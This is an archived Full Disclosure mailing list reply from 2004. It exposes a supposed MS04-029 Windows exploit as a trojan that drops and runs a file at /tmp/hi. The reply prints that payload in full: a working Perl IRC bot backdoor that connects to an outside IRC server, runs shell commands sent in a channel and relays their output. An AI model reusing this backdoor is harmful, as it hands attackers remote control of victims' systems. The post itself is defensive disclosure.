Full Disclosure mailing list archives
Re: New Remote Windows Exploit (MS04-029)
From: Deigo Dude <deigodude () aol com>
Date: Wed, 03 Nov 2004 16:54:48 -0500
>>Do i need too say more :DYou sure do, like for example, explain the following in your code and why it makes /tmp/hi (/var/tmp/hi) and then executes it and it contains this code
#!/usr/bin/perl$chan="#0x";$nick="k";$server="ir3ip.net";$SIG{TERM}={};exit if fork;use IO::Soc ket;$sock = IO::Socket::INET->new($server.":6667")||exit;print $sock "USER k +i k :kv1\nNICK k\n";$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+) /){$mode=$1;last if $mode= ="001";if($mode=="433"){$i++;$nick=~s/\d*$/$i/;print $sock "NICK $nick\n";}}prin t $sock "JOIN $chan\nPRIVMSG $chan :Hi\n";while(<$sock>){if (/^PING (.*)$/){prin t $sock "PONG $1\nJOIN $chan\n";}if(s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w ]* (.*)$/$1/){s/\s*$//;$_=`$_`;foreach(split "\n"){print $sock "PRIVMSG $chan :$
_\n";sleep 1;}}}#/tmp/hi _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- New Remote Windows Exploit (MS04-029) Heikki Toivonen (Nov 03)
- Re: New Remote Windows Exploit (MS04-029) Mik Mifflin (Nov 03)
- Re: New Remote Windows Exploit (MS04-029) Heikki Toivonen (Nov 03)
- Re: New Remote Windows Exploit (MS04-029) Deigo Dude (Nov 03)
- <Possible follow-ups>
- New Remote Windows Exploit (MS04-029) Max Load (Nov 03)
- Re: New Remote Windows Exploit (MS04-029) Dave Aitel (Nov 03)
- Re: New Remote Windows Exploit (MS04-029) Heikki Toivonen (Nov 03)
- Re: New Remote Windows Exploit (MS04-029) Brendan Dolan-Gavitt (Nov 03)
- Re: New Remote Windows Exploit (MS04-029) Rodrigo Barbosa (Nov 04)
- Re: New Remote Windows Exploit (MS04-029) Valdis . Kletnieks (Nov 04)
- Re: New Remote Windows Exploit (MS04-029) Rodrigo Barbosa (Nov 04)
- Re: New Remote Windows Exploit (MS04-029) Valdis . Kletnieks (Nov 04)
- Re: New Remote Windows Exploit (MS04-029) Brent J. Nordquist (Nov 04)
- Re: New Remote Windows Exploit (MS04-029) Valdis . Kletnieks (Nov 04)